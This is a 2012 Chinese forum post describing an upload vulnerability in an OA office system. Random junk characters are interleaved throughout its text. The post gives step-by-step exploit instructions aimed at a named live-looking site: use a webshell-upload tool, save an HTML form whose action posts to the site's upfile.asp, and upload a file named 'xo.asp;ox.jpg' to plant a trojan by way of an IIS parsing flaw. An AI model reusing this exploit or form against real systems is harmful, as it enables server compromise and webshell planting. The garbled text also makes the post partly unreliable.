全能OA办公系统 上传漏洞
* d. ]9 y0 o6 x A; p3 T* j4 j/ D
9 l( [$ V; r( [+ A" _系统介绍:
/ x0 k! C* L, V3 C/ ~! E' [1 ]! `9 F: l+ S% s/ ~: d) e5 p; j7 Z9 g: v
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。* h3 w( K! Z: T% X) p$ M0 e
6 D9 i& H+ i# P5 v& L6 s/ c6 \( P主要功能:
w/ h5 {# B. v. X公司通告
$ ~: }, P: P: e6 D w- Z工作计划 5 a# y1 ^: k( N* L( L
通讯助理 & f8 w( v V. i3 ~/ r) O
客户资源 0 A, l2 r$ I0 c! C
我的公文 6 e( g9 T* R, }3 o9 y; @6 I4 U
公文传阅 0 M% z2 x B# {) I2 x3 m) M
公共资源
3 |0 m7 K. X$ A. S) U资源预约
5 W4 z0 f3 D, M' {今日考勤 , E; l, b( c T9 X0 Q
个人计划 1 E4 I6 C: h, o! I! n
个人通讯录 1 \) \& X* ^9 Y4 x
个人基本档案 . v! p8 w( u; X$ }, y! ~: o2 o
未读邮件
: B1 l& L6 H J8 L1 e发邮件
$ w' D9 L) I) t4 V1 F收件夹 6 E2 O9 k4 S* @, e5 \4 u5 P6 _
寄件夹
7 R7 O5 X% I4 H1 F- ~7 e" ?9 B2 G网络硬盘
2 A1 q, {# ]9 V) ~1 S, J& L. d网络会议 7 d. j+ g6 y( n- Q: F5 _
网络调查
1 ~* B; `& b1 ^% ~1 Y交流论坛
0 ^& N% z3 C8 B# D8 t
C. v1 b1 W, u有兴趣测试的朋友可以下源码看看
2 f7 E f! @- O& C' T7 J
! l" K) d4 A9 t% u$ z! Q源码下载:
" Y" o! _, i2 K- t: G/ c P( n" z& @# b
http://www.mycodes.net/30/4750.htm
0 _" x+ ^; N( O* J L- `. y
/ |$ _' D) d7 k5 V1 \, O+ p" I) p漏洞介绍:5 H/ S2 C/ q n- l( Z/ E n1 Z
% C& R# | Z* K- w- R
由upfile.asp上传文件漏洞引起
. z' Z2 i9 \( o: B! ~- I9 f+ d; t d' T
测试方法:
0 `( ~1 R( i" W* d$ l2 P- ]. E- B
0 U, _9 ?# @5 @ [7 u: Q, T使用名小子上传http://www.itlynn.com/upfile.asp即可) Q7 a l/ H% b
: G( E/ ~1 T8 q9 A3 u# z# ^
如果upfile.asp文件被删除不存在。
+ n; `# a$ J+ k G" N; U+ e2 Z! }) {0 k7 y. B, D( A z. P
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
0 c8 Z7 Y4 O6 Q6 \4 E0 V
% ^* h. c, u+ b如果存在那么将如下代码保存为upfile.html。
9 S' U% }- ]3 k+ e% {* n# j7 h6 s' U- s. H7 o# v9 E2 e
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。8 r% ^$ a: k, F$ p
: J4 [6 X7 J0 X, N
( \+ Q1 O8 k P9 h& Y- x$ J8 I% ~& v
8 \7 C% S3 h) b% j& v
01 <table border='0' align="center" cellpadding="5">
/ z) M/ l9 l) `1 {
* C) g3 g/ z# Q3 t02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 9 M, V, X+ g: V, j' G
4 G* P2 Z5 ^) _0 \/ q03 <tr> 1 g- P# m# Q5 B I. l9 a
! Y) M* G' J# ]3 @& C! b H
04 <td>报错:</td> ! X7 o7 S' r2 e' O5 G+ W
, i" r% J9 B/ ], p: f
05 <td><input type='radio' name='errnumber' value='0'> + T4 s& ?! Y7 B- T! `/ c: {. E
* o6 s- W2 o5 G+ H) y06 自动更名 3 Z1 G2 P3 p6 {* _1 n
9 U6 P4 C+ d Z% a07 <input type='radio' name='errnumber' value='1' checked>
% g9 W# L% F- i8 X! G8 Z7 Z
; R7 ~8 N- K- _# s2 x$ ?08 报错方式 ; p C: e( j- q
# E6 n2 j; b" d! L& A" ~" ~09 <input type='radio' name='errnumber' value='2'> , c- z A1 K( `8 k
* G9 \. e1 U# `9 }3 x$ O, ?
10 直接覆盖</td> 9 O. P* G% u# Q. c( U% o2 L
% C' B6 H2 ~$ h11 </tr>
1 d- j/ y2 D3 u+ {1 `" P1 m4 a& y$ B4 K
12 <tr>
( n/ v. L: ^* f2 Z! E
0 I5 k6 f) o3 g [2 M13 <td>主题:</td>
) ]+ O0 J7 M& P+ X# n P
! h6 S6 r; H& n4 c# [8 H6 J14 <td><input type='text' name='filename' size='30'></td>
. W$ K9 f' I! ^ l1 Q+ v% A% q
9 r. J" [, F1 {9 F15 </tr>
& D& U, r3 ]) c$ q1 X, g' @9 [' \ y7 j% u- }; r6 f% T
16 <tr>
1 Q0 t" `) } d: a( t% J4 S* s- Z5 F# g6 p2 J8 _1 C3 }7 m* ~
17 <td>文件:</td>
1 H( L/ b8 r, W! E( r8 s a
- d5 s9 d& w" Q$ u" G) M& S18 <td><input type="file"name="fruit"size="30"></td> 9 s( C% C; r; y8 |7 V( ]/ v5 _$ m
0 ~- H) E( V/ X- M4 o3 A
19 </tr>
- S3 {/ O, {+ b7 ]9 E) d4 }8 j( t+ Y7 S2 T* G# X" @, o4 e* s
20 <tr> 2 p) I( }$ h/ g C9 m
& M* r& }( w( D: D y" ^( v
21 <td valign='top'>简介:</td> ) C; j9 d/ ?& A: B J. }3 g
; |7 @0 x, }& V2 w- q* G9 [# q
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
0 U' B; D# C, c" C
4 d7 ] _* t; a! k1 B23 </tr>
$ P, ]4 m! f, S9 n6 i( `# E2 P9 W7 z; c
24
* j1 S) S! @8 A) e" X: q; z. z' C5 j+ t2 G1 u8 x3 s3 B
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> / i" Q) I' ^4 F2 E3 m8 A
$ ^9 X6 y& {- C; A6 }0 k
26 </tr>
5 L! o; f# w0 Z( t' c
6 ?/ {' G" z: L; |27 </form> $ M- ]& I+ g2 M% ^# f2 c
5 t: b; R2 y7 b, N, P
然后打开上传一个文件名为xo.asp;ox.jpg的文件。1 v0 z) m6 E5 f% g' k
6 D/ z% I; O' A, r3 g5 ]+ ]$ U : b4 e/ p* H: S* P$ {
' `& m7 `) x+ c4 L9 x! K
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
& `4 ]7 j& V9 r$ K- U' M. A) k: v0 y' z$ G! s4 y. Y
此漏洞需要配合解析漏洞利用。
, D1 @" x4 s! c; O" M% s; Z5 y
0 G6 r c% p8 n5 w0 u5 a- C6 l |
发表于 2012-11-21 13:45:12
收藏
支持
反对